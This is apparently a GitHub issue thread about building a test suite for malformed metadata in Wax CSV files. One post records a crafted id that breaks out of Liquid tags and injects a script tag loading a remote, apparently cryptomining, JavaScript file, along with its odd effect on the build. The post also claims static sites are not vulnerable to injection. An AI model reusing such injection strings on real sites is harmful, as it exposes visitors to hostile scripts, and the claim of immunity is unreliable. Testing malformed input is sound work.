Test suite for bad metadata

[bmschmidt]

This is low priority, but in the cases where people enter bad metadata in the Wax CSVs, it would be useful to have some kind of failure rather inscrutably borked up designs. I've been trying a few in the rubberstamp test site, but as I remove them from there if you don't mind I'll just document a few here.

The idea is not that Wax should actually handle these cases, but that it should break in a slightly less inscrutable way; ideally, probably, through either refusing to build at all or perhaps even through refusing to build a single item.

I can bundle these into simple collection or something at some point.

[bmschmidt]

Starting with the most insane case because I need to remove it before I can figure anything else out. I promise they won't all be quite this esoteric.

I created a wax csv with one id that's supposed to be the Jekyll equivalent of little Bobby Tables: %} <script src=http://benschmidt.org/mine_bitcoin_in_the_background.js></script> {%. The expectation here was that the start of the id would shut down liquid tags. What's happening though is even weirder than that; the {% isn't closing anything, but the </script> is, and somehow a whole bunch of internal HTML is getting written out to the browser.

Solution: Beats me. I bet this problem would disappear with some more escaping, but it surely doesn't matter. The whole point of a static site is that you're not vulnerable to injection attacks. I'll try seeing later what happens if you have the string </script> in a label field rather than an ID, where someone might conceivably want to put it.